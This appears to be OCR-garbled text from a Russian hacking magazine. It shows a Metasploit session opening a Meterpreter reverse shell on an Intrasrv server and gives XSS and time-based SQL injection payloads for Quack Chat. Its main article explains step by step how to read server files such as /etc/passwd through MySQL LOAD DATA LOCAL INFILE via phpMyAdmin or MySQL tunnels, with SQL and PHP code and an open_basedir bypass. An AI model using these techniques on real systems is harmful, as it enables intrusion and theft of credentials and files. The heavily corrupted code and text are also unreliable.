Но5І АсИгеьБ: За4950 

ОоІТегі АсЫге55: 192 .168 Л. 105 

5егѵісе Мате: Иіігр 
5егѵісе Рог! : 80 
5егѵісе РгоТосоІ: Іср 
5ис се55^и! Віпсііп^ 



1Н05Т 

ЬРОЙТ 



4444 



Ехріоіі іагдеі: 



Ій Мате 



0 



ѵі.0 - ХР / Ѵі!іп7 



т а Т ехріоіі ( іпігаа 
ВН05Т => 10 Л Л. 1Ѳ 
т аі ехріоіі { іпі га § 
ІН05Т 10.1. 1.20 
таТ ехріоіі { іпі газ 



УС5 

уев 



ТНе Іівіеп асісігеав 
ТЬе Іівіеп рогі 



) > веі ЙН05Т 10 Л. 1.10 



) > зеі ЦНОЯГ 1ѲЛЛ.2Ѳ 



) > ехріоіі 



[*] Біагіесі геѵегве Напсііег оп 10 Л Л. 20:4444 
[*] Бепсііпд Ьиііег... 

[*] Еепсііпд віаде (7511Ѳ4 Ьуіев) іо 10.1.1.10 
[*] Меіегргеіег веввіоп 1 орепесі ( 10 Л Л ,20 : 4444 
2 11:54:48 +Ѳ530 

гпеіегогеіег > зувіп^оЯ 



-> 10 Л Л Л0 : 1031 ) аі 2Ѳ13-Ѳ8-2 



Пример запуска веб-сервера Іпігазгѵ в ѴѴіпсІоѵѵз 7 



Пример эксплуатации уязвимости в веб-сервере іпігавгѵс помощью 
Меіазріоіі-модуля 



ТАВСЕТ8 

Іпігазгѵ <= 1 .0. 



1оса1Ио5Т/яс_асІтіп/іпсІех. рІір?р=ІіІ5Тогу&раёе=2%22%22%ЗЕ%ВСі = ; 
іт§%205ГС=х%20опеппог=рготрТ%28/Х$5/%29;%ЗЕ%ЗЕ 



80ШТІОЫ 

Пат^а на момент написания статьи не было. 



МНОГОЧИСЛЕННЫЕ УЯЗВИМОСТИ 
В СШАСК СНАТ 



СѴ85ѵ2: 


М/А 


Дата релиза: 


15 августа 2013 года 


Автор: 


Эуіап ІГ 2 І 


СѴЕ: 


Ы/А 



Приложение Оиаск СРіаі — это чат, написанный на РНР и НТМІ-5 с использо- 
ванием технологии АбАХ. В основном он используется для удобного общения 
на сайте с помощью мобильных устройств. Как и в случае с роутером, перей- 
дем сразу к эксплуатированию веб-уязвимостей. 

ЕХРДОІТ 

Начнем с простой Х35-уязвимости, которая проявляется в разделе нізТогу. 
Ее можно проэксплуатировать двумя способами: 

1. При общении в чате в качестве параметра паше можно передать следую- 
щую конструкцию: 

'"'хітё 5гс=х опеггог-рготр1:(/Х55/) ; >> 

После чего она отобразится на странице 1оса1Но$1/яс_асІтіп/іпс!ех. 
рИр?р=Ііі5І:огу. 

2. Обратиться к определенной странице лога общения в чате: 
1оса1Но5І:/дс_абтіп/іпбех. рНр?р=ІіІ5І:огу&ра§е=2+(Х55 Ѵес1:ог) 
Например: 



Сеі уоиг диезіюпз апэиегеб опііпе. 






Абтіп: То зіагі уоиг бето, дгаЬ уоиг ріюпе ог іаЫеі апб до іо 
диаск-сііаісот/дс агітіп 



Следующая 50Е-уязвимость содержится в том же разделе: 

* ІосаІНо5Ѵцс_артіп/1пбех.ріір?р=Гіі5І:огу&ісІ=(ЗОІ_ іпіесііоп) 

• ІосаІМо5І/ЦС_асігіпіп/іпбех.рИр?р=Ііізіогу&раде={50Е Іщесігап) 

Пример использования: 

ІтЕЕ р : // зіііе . сот/дсабтіп/іпбех. ріір?р=ИІ5І:огу&іб =1 +апб +*-' 
5Іеер(10) 

И последняя на сегодня — раскрытие путей. Если в качестве 50Е- 
уязвимости в прошлом запросе передать символ ' , то получим: 

ІосаІІпозЕ/дсабтіп/іпбех ,рІпр?р=НІ 5 І:огу&іб= ' 

_ » ■ 

іп /ѵаг/ши/сНаі:/дс_абтіп/іпбех. рЬр оп Ііпе 249 

ТАНСЕТ8 

Оиаск СНаі <- 1 .0. 

50ШТІ0Ы 

Патча на данный момент не существует. Кстати, этот же чат используется 
в деморежиме на официальном сайте :). 

УДАЛЕННЫЙ ОТКАЗ ОТ ОБСЛУЖИВАНИЯ 
ВВШ 



СѴ55ѵ2: 


7 . 8 ( АѴ: М/АС: ЦАи : N/0: N/1 : N /А:С) 


Дата релиза: 


30 июля 2013 года 


Автор: 


неизвестен, Махіт Збибгак 


СѴЕ: 


2013-4854 



И напоследок уязвимость нулевого дня. Она была обнаружена после успеш- 
ных атак в июле 2013-го на РЫЗ-серверы, использующие ЕШО. Сам ВІМй яв- 
ляется открытой и наиболее распространенной реализацией ЭМЗ-сервера, 
более того, на 10 из 13 корневых РЫЗ-серверах используется именно он. 
Для того чтобы вызвать падение сервера, достаточно было отправить специ- 
ально сформированный запрос с некорректно заполненной РЮАТА-секцией, 
которая неправильно обрабатывалась при составлении Іод-сообщения. 

ЕХРДОІТ 

Эксплойта пока нет в публичном доступе, но, как было сказано выше, он ак- 
тивно использовался темной стороной. 

ТАПСЕТ8 

ІЗС ВІЫЭ 9.7.0а1-9.9.3РЮ1; 

ІЗС Опзсо Віпб 9.9.331-9.9.431 Ы . 



Оиаск СНаІ собственной персоной 



80ШТІ0К 

Есть обновление от производителя. 3 
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Описываю довольно частую ситуацию. Во время пентеста получен доступ 
к рНрМуАсІтіп на удаленном хосте, но добраться через него до файлов не полу 
чается. Во всем виноват пресловутый флаг НІ_Е_РВІѴ=по в настройках демона 
Му5(ЗІ_. Многие в этой ситуации сдаются и считают, что файлы на хосте таким 
образом уже не прочитать. Но это не всегда так. 



Алексей Москвин 

Розіііѵе Тесііпоіодіез 

ато5кѵіп(5ір-і5есигиѵ.ги 
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ПРЕЛЮДИЯ 

Когда речь идет о взаимодействии СУБД МуЗСН- с файловой си- 
стемой, то вспоминают, как правило: 

• функцию 1_ОАО_РИЕ, позволяющую читать файлы на серве- 
ре; 

• конструкцию 5ЕІ_ЕСТ ... ІЫТО ОСТРИЕ, с помощью которой 
можно создавать новые файлы. 

Соответственно, если получен доступ к рбрМуАсІтіп или 
любому другому клиенту на удаленной машине, то с большой 
вероятностью через МуЗОІ. можно добраться до файловой 
системы. Но только при условии, что в настройках демона 
установлен флаг ЕІІ_Е_РНІѴ=уез, что бывает далеко не всегда. 
В этом случае надо вспомнить про другой оператор, куда ме- 
нее известный, но при этом обладающий довольно мощным 
функционалом. Я говорю об операторе ЮАР РАТА ІЫРИЕ, 
об особенностях которого и будет рассказано в этой статье. 

СИНТАКСИС І.ОАО ОАТА 

Оператор ЕОАР ОАТА, как гласит документация, читает строки 
из файла и загружает их в таблицу на очень высокой скорости. 
Его можно использовать с ключевым словом ШСАБ (доступно 
в МуЗОІ. 3.22.6 и более поздних версиях), которое указывает, 
откуда будут загружаться данные. Если слово ЕОСАІ отсутству- 
ет, то сервер загружает в таблицу указанный файл со своей ло- 
кальной машины, а не с машины клиента. То есть файл будет 
читаться не клиентом МуЗОЦ а сервером МуЗОЦ Но для этой 
операции опять же необходима привилегия РІІ_Е (флаг РІІ_Е_ 
РНІѴ=уез), Выполнение оператора в этом случае можно срав- 
нить с использованием функции І_ОАР_РІІ_Е — с той лишь раз- 
ницей, что данные загружаются в таблицу, а не выводятся. 
Таким образом использовать 1_ОАВ РАТА ІЫРІІ_Едля чтения фай- 
лов имеет смысл только тогда, когда функция І_ОАР_РІІ_Е недо- 
ступна, то есть на очень старых версиях МуЗОЦсервера. 

Но если оператор используется в таком виде: ЮАР РАТА 
ЬОСДЬ ІІМРПЕ, то есть с использованием слова І.ОСАЦ то файл 
читается уже клиентской программой (на машине клиен- 
та) и отправляется на сервер, где находится база данных. 
При этом для доступа к файлам привилегия РНЕ, естественно, 
не нужна (так как все происходит на машине клиента). 

ЧТЕНИЕ ФАЙЛОВ 

Внимательный читатель, наверное, уже догадался, что если 
у нас есть аккаунт в рйрМуАсІтіп, то мы сможем читать про- 
извольные файлы, не имея привилегию РІІ_Е, и даже обходить 
ограничения орепЬазесІіг. Ведь очень часто и клиент (в данном 
случае рйрМуАсІтіп), и демон МуЗОІ. находятся на одной и той 
же машине. Несмотря на ограничения политики безопасности 



13.2.6 . ьоас дата імеіье Зупіах 

ЬОАД РАТА [ЬОИ_РКІОКІТУ | СОЫСШЯЕМТ] [ІОСАЬ] ІМГІЬЕ 'Гііедате* 
[КЕРІлАСЕ | I СЛОВЕ] 

ІЫТО ТАВЬЕ іЫ_лате 
[СНАЯАСТЕЯ ЗЕТ сЬагзеі^лате ] 

[ { ГІЕІР5 ) СОІШЛ5} 

[ ТЕ КІ-ІІ МАТЕР БУ ' зЬгілд'] 

[ [ОРТІОЛАЬЬУ) ЕМСЬОЗЕР ВУ ’сЬаг’] 

[ЕЗСАРЕР ВУ 1 сЬаг ' ] 

) 

[ЫМЕ5 

[5ТАВТІЛС ВУ * зЬгілд'] 

[ТЕЯНІМАТЕР ВУ ' зЬгіпд ' ] 

] 

[I СЛОВЕ литЪег ЫЛЕ5] 

[ ( соі лаше ог ияег ѵаг, . . . ) ) 

[ЗЕТ сок пате = ехрг, . . . ] 



Синтаксис оператора сервера МуЗОЦ мы можем воспользоваться тем, что для кли- 

ьо ар ОАТА I N ріье ента эта политика не действует, и все-таки прочитать файлы 

из системы, запихнув их в базу данных. 

Алгоритм простой. Достаточно выполнить следующие ЗОІ_- 
запросы: 

1 . Создаем таблицу, в которую будем записывать содержимое 
файлов: 

СГСЕАТЕ ТАЕЯЕ 1:етр(соп1:еп1: І іехі: ) ; 

2. Отправляем содержимое файла в созданную таблицу: 

ЮАР РАТ А Ю СА I. I N Р НЕ V еѢ с/ІЮ5І:5 ' ЮТО ТАВІ.Е «-■ 

-Ьетр РІЕЮ5 ТЕКМІ№ТЕР ВУ *_ео^ ' ЕЗСАРЕР <-■ 

ВѴ ' ' ИМЕВ ТЕКМІМАТЕР ВУ ' ео-Р ‘ : 

Вуаля. Содержимое файла /еІс/НозСз теперь в таблице 
іетр. Нужно прочитать бинарные файлы? Нет проблем. Если 
на первом шаге мы создадим такую таблицу: 

СКЕАТЕ ТАВІ.Е ’ЬІП' ( , ЬІП > ВЮВ N01 ШН )_м 
ЕИСЗЖ = МУ I БАМ ; 




РНР — самый распространенный язык для создания веб- 
приложений, поэтому стоит рассмотреть подробней, каким 
образом он взаимодействует с базой данных. 

В РНР4 клиентские библиотеки МуЗСН были включены 
по умолчанию и входили в поставку РНР, поэтому при уста- 
новке можно было только отказаться от использования 
МуЗОЦ указав опцию — ѵѵШіоиі-тузрІ. 

РНР5 поставляется без клиентской библиотеки. 

На *піх-системах обычно собирают РНР5 с уже установлен- 
ной на сервере библиотекой ІіЬтуздІсІіепІ, просто задав 
опцию --ѵѵіІМ-тузрЦ/изг при сборке. При этом до версии 
5.3 для взаимодействия с сервером МуЗСН используется 
низкоуровневая библиотека МуЗСН СІіепІ УЬгагу (ІіЬтузрІ), 
интерфейс которой не оптимизирован для коммуникации 
с РНР-приложениями. 

Для версии РНР 5.3 и выше был разработан МуЗСП 
Ыаііѵе Огіѵег (тузріпб), причем в недавно появившейся вер- 
сии РНР 5.4 этот драйвер используется по умолчанию. Хотя 
встроенный драйвер МуЗСН написан как расширение РНР, 
важно понимать, что он не предоставляет программисту 



РНР нового АРІ. АРІ к базе данных МуЗСН для программиста 
предоставляют расширения МуЗСН, тузріі и РОО_МУ5СП. 
Эти расширения могут использовать возможности встроен- 
ного драйвера МуЗСН для общения с демоном МуЗСН. 

Использование встроенного драйвера МуЗСН дает неко- 
торые плюсы относительно клиентской библиотеки МуЗСН; 
к примеру, не требуется устанавливать МуЗСН, чтобы со- 
бирать РНР или использовать работающие с базой данных 
скрипты. Более подробную информацию о МуЗСН Ыайѵе 
Огіѵег и его отличиях от МЬтузцІ можно найти в документа- 
ции ( ЫМѵ/14ѵОНХа ). 

Расширения МуЗОЦ тузціі и РРО МУЗСП могут быть 
индивидуально сконфигурированы для использования 
либо ІіЬтузцІ, либо тузріпсі. Например, чтобы настроить 
расширение МуЗОІ_для использования МуЗОІ-СІіепС ЫЬгагу, 
а расширения тузріі для работы с МуЗОБ Майѵе Огіѵег, не- 
обходимо указать следующие опции: 



. /сопй е и ге -- ЦІ*Ь- ту5д1=/и5г/Ь іп/плузд1 _соп6 % 
-гМІ^Іі-ту5р1і=ігіу5ЯІпс1 



то 



ѴѴАІШШС 



Вся информация предо- 



ставлена исключительно 



в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 
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Взлом 
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іехі 

гоо1:х:0:0:гооі:/гооІ:/Ьіп/Ьа$Н 

сізетоп:х 1 : 1 ;сІаетоп;/изг/зЬіп:/Ьіп/зІі 

Ьіп:х:2:2:Ьіп:/Ьіл:/Ьіп/зК 

зуз:х:3:3:зуз:/<іеѵ:/Ьіп/зіі 

зупс:х:4 : 65534 : зупс:/Ьіп:/Ьіп/5упс 

датез:х:5:60:датез:/изг/датез:/Ьіп/зЬ 

тап:х:6:12:тап:/ѵаг/сасЬе/тап:/Ьіп/з!і 

Ір:х:7:7:Ір:/ѵаг/зрооІ/Ірсі:/Ьіп/5Ь 

таіІ:х:8:8:таіІ:/ѵаг/шаіІ:/Ьіп/зЬ 

пеѵѵз:х:9:9:пеѵѵз:/ѵаг/зрооІ/пеѵѵз:/Ып/5И 

ииср:х:10:10:ииср:/ѵаг/$роо!/ииср:/Ьіп/зЬ 

ргоху:х: 1 3: 1 3: ргоху :/Ьіп:/Ьіп/зИ 

ілллллкіаі а : х : 3 3 : 3 3 : ѵѵмакі аі а : /ѵа г/ѵѵѵѵѵѵ : / Ьі п/зН 

Ьаскир:х 34:34 :Ьаскир:/ѵаг/Ьаскирз:/Ьіп/зЬ 

Іізі:х:38:38:МаіІіпд Изі Мападег:/ѵаг/ІізІ:/Ьіп/з 




В расширении МуЗСН. возможность использовать ІОСАІ регулируется РНР_ІЫІ_ 
ЗѴ5ТЕМ директивой тузці.аііоѵѵіосаііпіііе. По умолчанию эта директива имеет 
значение 1, и поэтому нужный нам оператор обычно доступен. Также функция 
тузцісоппесі: позволяет включать возможность использования ЮАР ОАТА 
!_ОСАІ_, если в пятом аргументе стоит константа 128. 

Когда для соединения с базой данных используется расширение РРО_ 
МуЗОЦ то мы также можем включить поддержку І_ОСАІ_, используя константу 
РЭО : : МУЗОб_АТТП_1_ОСАи N РІ І_Е { і п*ед ег ) 

$рсІ 0 = пем _РР0( ' тузд і : Ііо5^=1оса1Іі05'Ь : еИэпа те-тусІЬ ' } ' іі5е г ' . 

' раза ’ . аггаѵГРРО: :МУ50І. АПК І_ОСАІ_ ІИРП Е => 1 )_)_і 

Но самые большие возможности для работы с оператором І.ОАО ОАТА 
предоставляет расширение плузріі. В этом расширении тоже предусмотрена 
РНР ІЫІ ЗѴЗТЕМ директива ту5д1і,а11ом_1оса1_іп1і1е, регулирующая исполь- 
зование і_осац 

Если соединение осуществляется посредством тузціі геаі соппесі, то 
с помощью тузріі орііопз мы можем как включить, так и выключить поддержку 
ШСАЦ Более того, в этом расширении доступна функция тузрІі_зеІ_ІосаІ_іпТіІе_ 
МапсІІег, которая позволяет зарегистрировать саІІЬаск-функцию для обработки 
содержимого файлов, читаемых оператором І_ОАО РАТА ЮСАб ІЫРІЬЕ. 



Содержимое файл а /еіс/раззті в таблице Іезі 

то в нее возможно будет загружать и бинарные файлы. Правда, 
в конец файлов будут добавляться лишние биты, но их можно 
будет убрать в любом Мех-редакторе. Таким образом мож- 
но скачать с сервера скрипты, защищенные ІопСиЬе/2епсІ/ 
ТгиеСгурІ/І\іи5рІіеге, и раскодировать их. 

Другой пример, как можно использовать ШАР РАТА І_ОСАІ_ 
ІЫРЩЕ, — узнать путь до конфига АрасМе’а. Делается это сле- 
дующим образом: 

1. Сначала узнаем путь до бинарника, для этого описанным 
выше способом читаем /ргос/зеІТ/сгпсІІіпе. 

2. И далее читаем непосредственно бинарник, где ищем 
НТТРР_ВООТ/5ЕВѴЕВ_СОМРІС_РПЕ, 

Также можно попробовать прочитать файлы таблиц МуЗОЦ 
если права на эти файлы позволяют сделать это (обычное 
дело на виндовых серверах). 

Ясно, что в данной ситуации скрипты рИрМуАсіпліп игра- 
ют роль клиента для соединения с базой данных. И вме- 
сто рбрМуАбтіп можно использовать любой другой веб- 
интерфейс для работы с МуЗОЦ 

К примеру, можно использовать скрипты для бэкапа и вос- 
становления базы. Еще в 2007 году французский хакер под ни- 
ком асісігоо* выложил в паблик эксплойт, основанный на этом 
замечании и дающий возможность читать файлы из админ-па- 
нели ріірВВ <= 2.0.22. 

ТУН НЕЛЬ -УДОБНО. ТУННЕЛЬ -НЕБЕЗОПАСНО 

При установке сложных веб-приложений зачастую требует- 
ся прямой доступ в базу, например для начальной настройки 
и корректировки работы скриптов, Поэтому в некоторых случа- 
ях целесообразно установить на сервере простой скрипт — так 
называемый МуЗОІ_ ТиппеІ, позволяющий выполнять запросы 



к базе данных с помощью удобного клиента вместо тяжеловес- 
ного рбрМуАбтіп. 

Туннелей для работы с базой данных довольно много, 
но все они не очень сильно распространены. Пожалуй, один 
из самых известных — это Масготебіа Огеат ѴѴеаѵег Зегѵег 
Зсгірід Посмотреть исходники этого скрипта можно тут: Мі. 

|у/15Ыа1СЗ . 

Основное отличие МуЗОЬ ТиппеІ от рИрМуАсІтіп — это не- 
обходимость вводить не только логин и пароль от базы данных, 
но и хост, с которым нужно соединиться. При этом туннели ча- 
сто оставляют активными, ну просто на всякий случай, мало ли 
что еще нужно будет поднастроить. Вроде как воспользовать- 
ся ими можно, только если есть аккаунт в базу данных, — тог- 
да чего бояться? Короче, создается впечатление, что туннель 
особой угрозы безопасности веб-серверу не несет. Но на са- 
мом деле не все так хорошо, как кажется на первый взгляд. 

Рассмотрим следующую ситуацию. Пусть на сервере А 
есть сайт зііе.сот с установленным туннелем б11р://зі1:е.сот/_ 
ттЗегѵегЗсгіріз/ММНТТРОВ.рИр. Предположим, что на сер- 
вере А есть возможность использовать І_ОАО РАТА 1_ОСАІ_ (как 
обсуждалось выше, это, например, возможно при дефолт- 
ных настройках). В этом случае мы можем взять удаленный 
МуЗОІ_-сервер, в базы которого пускают отовсюду и который 
тоже позволяет использовать І_ОСАЦ и соединиться с этим 
сервером с помощью туннеля. Данные для коннекта с удален- 
ным МуЗОб-сервером: 



ов 


нозі: : 


XX, XX, XX* XXX 


эв 


Мате: 


пате_гешоХе_6Ь 


□в 


Іізег : 


ои г_изег 


ов 


Раза : 


оип_ра55 



В данной ситуации сервер А будет играть роль клиента, 
и поэтому мы можем отправлять файлы с его хоста в удален- 



Сервер: рИрМуАсітіп сіето - Му801_ 



іі Базы данных ^ 5 ОБ іЦ| Состояние ‘ Пользователи й Экспорт е 



Выполнить БОБ-запрос(ы) на сервере ’рІѵрМуАгіпііп сіѳгпо * УуБОБ": 

1_ОАО ОАТА І_ОСАІ_ ШГІІ.Е ’/еІс/раззѵугі’ ІІЧТО ТАВ1_Е *ез* 

ьОЫ> ОАТА ЬОСАЬ ІЯ?!!,* ' /есс/раэзѵсі ' ІІПГО ТАЗЫ ъезг; 



Добавлена 31 строка. (Запрос занял 0.0253 сек ) 



Помещаем содержимое файла /еЩ/раавѵѵгі в таблицу іезі 



Запрос выполнен удачно 
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в 9 






о і-4 




25.09.2010, 23.10 



^ке$*ег 




Регистрация: 01.07.2010 
Сообщений: 23 е ! 

Р'к-і іу ілцин . 150 



\ МуЗцІ Ш*_ргіи - по чтение фпнпоп. 

Вобщем-то мне стыдно, но истина дороже, поэтому публикую, <§ 
состоялся у меня разговор с товарищем Ріохоі'м на отвлеченную тему,, в котором н| 

без прнвелегий Р[і_ё. Я в это дело нр поверил и попросил продемонстрировать, на чт) 
не стал, а полез в маны, и вот что тан увидел: 

Іъйр ://ѵіѵ4ѵі . ту в д I . ги/Рсс$/т а п/ ІО АР_Р ДТА . Ніт I 

1 1 н ( я э а : 

Команда ШДО ОАТА ГІЧІ ПІЕ читает строки из текстового' файла и вставля 
ключевое слово ЮСАЦ то файл читается с клиентского хоста, Если же Ц 
сервере. (Опция ЮС АІ. доступна в версии МуЗДі 3.22.6 и более поздній 1 

Если текстовые файлы, которые нужно прочитать, находятся на сервере 
либо размещаться в директории базы данных, либо быть доступными дл 
Применения команды !_0АО ОАТА ШРПЕ к серверным файлам необходим 
^есіюп 4.2.7 Привилегии, Предоставляемые Му5<ЗЦ 



Обсуждение темы в кулуарах Ксіоі.огд 



ную базу или, другими словами, читать файлы. Следующим 
нехитрым запросом: 





нашабд'л ’юзер'л ’пасс' , аггау СРРО: :<-■ 

МУ501_АТІР1_ІОСАІ_ІМРІІЕ => 1)Хі 

$е=Ірс!о->ехесС , 10А0 РАТА ЮСАЬ ІИІГИ-Е ’ . /раТІі^ 

/То/біеі ІГ\)Т0 ТАВІ.Е безі: РІЕЫЭ5 .ТЕКМИЧАТЕР 

ВѴ ; ео-р ' Е5САРЕР ВУ 1’ _]ЛІ\ІЕ5 ТЕКМІІЧАТЕ0 

ВУ ео-Р :"іі 

$рбо = пиіі; 



Туре=МѴ5{21_&Тітеои1:=100&Но5б=хх . хх . хх . ххх8Юа1:аЬа5е=ч-> 
паше_гетоі:е_сІЬ&Ц5епМате=оцг_и5ег&Ра55ыогсІ=оипра55& < -‘ 
орСос!е=Ехеси1:е5(2І-&50І-=І-ОАО ОАТА ЮСАЬ ИЧРИ-Е ^ 
/рабЬ/То/зсгірТ/зеТир^орІііопз . рМр 1 ІІМТ0 ТАВІ.Е 

Тшр_ТЬ1 РІЕЮ5 ТЕКМІІЧАТЕО ВУ ' еоТ 1 Е5САРЕР <е 

ВУ ' 1 І_ІІ\ІЕ5 ТЕКМІІМАТЕР ВУ ' еоТ 1 



На самом деле эта уязвимость более опасна, чем обычное 
чтение файлов: ведь она позволяет прочитать конфигурацион- 
ные файлы скриптов, установленных на сервере А. Через этот 
же туннель можно получить уже прямой доступ к базе, кото- 
рая управляется этими скриптами. Описанную выше технику 
по использованию мускульных туннелей можно немного обоб- 
щить и применить при эксплуатации ипзегіаііге-уязвимостей. 

ОБХОД ОГРАНИЧЕНИЙ ОРЕЫ_ВА$ЕОШ 

Использование ЮАО ОАТА довольно часто позволяет обходить 
ограничения ореп_Ьазебіг. Это может оказаться полезным, если, 
например, мы имеем доступ в директорию одного пользователя 
на зГіагеб-хостинге, но хотим прочитать скрипты из домашнего 
каталога другого пользователя. Тогда, установив такой скрипт 

<?рГір 

$рсІо = по 'л 1 РР0( ’ шузці: Но5Т=нашхост;с1Ьпате='е 



\ѵ\ѵ\ѵ 

Топик по МуЗдІ 1іІе_ргіѵ = 

по: Ьіі.Іѵ/14ѵѴУЬгО 

ЮАР РАТА ІІЧРІІ-Е 

Зупіах: ЬІМу/АСхНх 

Соппесііпд Іо МуЗОІ- 
зегѵег: Ыі.Іѵ/ІеЭаЗГіо 



можно попытаться прочитать файлы, обходя ограничение ореп_ 
Ьазебіг. Полезный хинт. 

ЗАКЛЮЧЕНИЕ 

Любопытно, что описанная возможность оператора ЮАО ОАТА 
известна не меньше десяти лет. Упоминание о ней можно, на- 
пример, найти в тикете [#15408] (За^е Мойе / Му50І_ѴиІл 2002- 
02-06), и потом похожие вопросы неоднократно всплывали 
на Ьидв.ріпр.пеі [#21356], [#23779], [#28632], [#31261], [#31711]. 
На что разработчики отвечали дословно следующее: 



ѴѴбаі із пеѵѵ іп РНР [2003-04-24 04_:1б ІІТС] §еог§@рІір. пеі: 

5.3 — рагі 3: туздіпсі: Іф\5 поТ а Ьи§, Ю-’з а Теа1:иге : *) 



Или присваивали тикету 5ШШз:ѴѴопі Их. Или ограничива- 
рбрВВ <- 2.0.22 лись патчами, которые почти ничего не решали. Тикеты на эту 

Ветоіе Оаіабазе тему возникали вновь. Поэтому указанный способ обхода 

Аиібепіісаііоп Оеіаііз ореп_Ьазебіг и до сих лор работает на довольно большом ко- 
РОС: ЫЦу/14ѵѴ\/тСЗ личестве серверов. Впрочем, с появлением нового драйвера 

гпуздіпб, похоже, было принято решение внести существен- 
РНР За^е Мобе ные изменения: при дефолтных установках этот оператор те- 

Рііезузіет Сігсит- перь вообще не будет выполняться [#54158], [#55737]. Будем 

ѵепііоп РгоЫет: надеяться, что в ближайшем будущем разработчики наведут 

Ьіі. Іу/17 І_зРоѴ порядок в этом вопросе. ОС 



КЛИЕНТ-СЕРВЕР 



Для того чтобы лучше понять возможности 
ЮАР РАТА, необходимо вспомнить, что СУБД 
МуЗОІ- использует традиционную архитектуру 
клиент-сервер. Работая с МуЗОІ-, мы реально 
работаем с двумя программами: 

* программа сервера базы данных, рас- 
положенная на компьютере, где хранится 
база данных. Демон туздіб «прослушивает» 
запросы клиентов, поступающие по сети, 

и осуществляет доступ к содержимому базы 
данных, предоставляя информацию, кото- 
рую запрашивают клиенты. Если тузціеі за- 
пущен с опцией --1оса1-іп1і1е=0, то ЮСАЦ 
работать не будет; 

• клиентская программа осуществляет под- 
ключение к серверу и передает запросы 

на сервер. Дистрибутив СУБД МуЗОІ- вклю- 
чает в себя несколько клиентских программ: 
консольный клиент МуЗОІ- (наиболее 
часто используемая), а также туздібитр, 
тузціабтіп, туздізііоѵѵ, туздіітрогі и так 
далее. А при необходимости даже можно 
создать свою клиентскую программу на ос- 



нове стандартной клиентской библиотеки 
ПЬтузрІ , которая поставляется вместе 

с субд музой 

Если при использовании стандартного кли- 
ента МуЗОІ- не удается задействовать оператор 
ШАР ОАТА 1_ОСАІ_, то стоит воспол ьзоваться 
ключом --ІосаІ-ігФІе; 

тузрі - -ІосаІ-іпЯІе зашрсІЬ 

т ѵ5д1> ЮАР РАТА І_0 СА І_ ІМРИЕ ’ш етЬег.^ 
ЪсС 1 ШТО ТАВІ.Е тетЬег: 

Либо указать в файле /ту.епі 1 опцию 
для клиента: 

[сІіеігЕ] 

Іосаі ііп1і1е=1 

Важно отметить, что по умолчанию все 
МуЗОІ-- клиенты и библиотеки компилируются 
с опцией --епаЫе-ІосаІ-іпйІе для обеспе- 
чения совместимости с МуЗОІ 3.23.48 и более 




старыми версиями, поэтому ЮАР РАТА ЮСАЦ 
обычно доступно для стандартных клиентов. 
Однако команды к МуЗОЬсерверу отсылают- 
ся в основном не из консоли, а из скриптов, 
поэтому в языках для веб- разработки также 
имеются клиенты для работы с базой данных, 
которые могут отличаться по функционалу 
от стандартного клиента МуЗОІ-. 

Конечно, эта особенность оператора 
ЮАР РАТА может быть угрозой безопасности 
системы, и поэтому начиная с версии МуЗОБ 
3.23.49 и МуЗОІ- 4.0.2 (4.0.13 для ѴѴіп) опция 
ЮСАІ_ будет работать только если оба — клиент 
и сервер — разрешают ее. 








Любой инструмент, каким бы продвинутым ни был, не способен решить все задачи пользователя. 
Поэтому разработчики предусматривают возможность расширения продукта за счет плагинов. 
Даже ЮА Рго, активно используемый реверсерами по всему миру, без расширений — лишь очень 
хороший дизассемблер. Чтобы превратить его в грозное оружие реверс-инженера, придется об- 
весить его плагинами. Наиболее интересные из них мы специально отобрали для тебя. 



С1-А58ШРОПМЕП 

Ы1.!ѵ/У0СѴѴ5Г 

Вайду активного использования в настоящее время ООП, данный плагин просто обязан быть в арсена- 
ле любого реверсера, Он сканирует М5ѴС 32Ы1: ЮВ файлы на наличие ѵДаЫез (таблицы виртуальных 
функций) с С++ РіТТІ (Вип-Тіте Туре ІпФгтабоп) и МРС ВТСі (СВипбтеСІазз структура) типом данных. 
Ищет и выделяет определенные структуры, имена, метки и комментирует их в дизассемблированном 
листинге, делая таблицы виртуальных функций более читабельными для реверс-инженера. 



; бЕшсЕ еНЕтІНоБЕСЕг 1 : зЕгисЕ ІСтгіТагдеЕ ; [МІ] 0: 36, А ; 1 (СІаББ ІпГогпег ) 
гйа1:а:В§9424Ре Лй отеЕ ??^4СН*п1Но5ЕСЕгіеебВІЕШгорТагдеШапй1егѲѲ0 ; соп5І им пШо чіі:і г і 

; сопбЕ СНЕпіНобЕСЕгі : : ' иЕЕаЫе " {Рог ’ ІЕМОгорТагдеЕКапйІег ' } 

?? 7СН1:п1Н051С1:г1[а@бВ ІЕНПгорТагдеігНапйІегѲСТа йд оПбрЕ БиЬ 5Д242Е 

гЛаіа : (Ш9425О0 ; 0А1А ХКЕГ : &иЬ_441Ф5й+44Іо 

гйаііа: 009425 ОЙ ; 5иЬ_441ОА2+17і0 

гйаЕа : Й09425В4 іі гі оЕЕбѳЕ бШ)^5024ВЗ 

гййіа : ІШ9425 ОН сШ оРЕбрЕ 501)^502209 

пІаЕа : Ѳ 09425 60 сісі оРРбѳЕ б оЕ 5028В В 

і 0з 1: а : 069425 10 ; 

гЛэЕа :В©942510 ; с1а55 СНЕпіНобССЕгі: АТІ_ : гСіШЛоиІпрКОНЕРіХНрБЕеЕгІ , АП : іСШпйои, АТЬ : :Ш,пТѴаіЕ5<144284Ѳ576 , &>> и АТЕ : іСНІлйомІпрІІ 
гііаіа : 08942510 йеі оРРзеЕ ??^4СНЕт1Но5ЕСЕг1№бВСНЕпйН05ЕСЕг1ЯВН ; сопзі СНЕийНозЕСЕгІ : 

; сопбЕ СВЕгоіНобЕСЕгі : : ^иРЕаЬІе ' {Рог 'СНЕрііКобЕСЕгі ‘ > 

??_7СНЕпХНо5ЕСЕг1ѲѲ6ЁСНЕп1Но5ЕСЕг1Иа@ 1(1 оРРбрЕ БиО_456й5Е 

г ЛаЕа : 0094251% ; 0А1А ХВЕЕ : 5 ііі)_ 441 95А+ЭЕТо 

гйаЕа : Ѳ0942514 ; 5иЬ_44И>А2+11Іо 

гйаЕа : 0094251® йй оРРвеЕ бііЬ 4410ГЕ 

гйаЕа : 0894251 С йй оРРвеЕ гиЬ_441096 

гйаЕа : 0094252 И йй оРРбоЕ гшіібоЬ 239 



Результат работы СІазз Іп^огшег 



МНР 

Ыі.Іѵ/15ІЩд01 

Универсальный швейцарский армейский нож 
для ЮА Рго. Был создан для поиска уязвимостей, 
